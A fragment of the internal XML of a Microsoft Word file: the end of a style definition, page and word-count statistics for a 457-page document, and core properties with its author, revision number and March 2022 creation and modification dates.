    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00832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F9D9-90F0-4595-8D37-53A704DF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457</Pages>
  <Words>126685</Words>
  <Characters>722110</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6017</Lines>
  <Paragraphs>1694</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>847101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健</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>宋 健</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2022-03-04T03:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-04T02:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-04T03:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>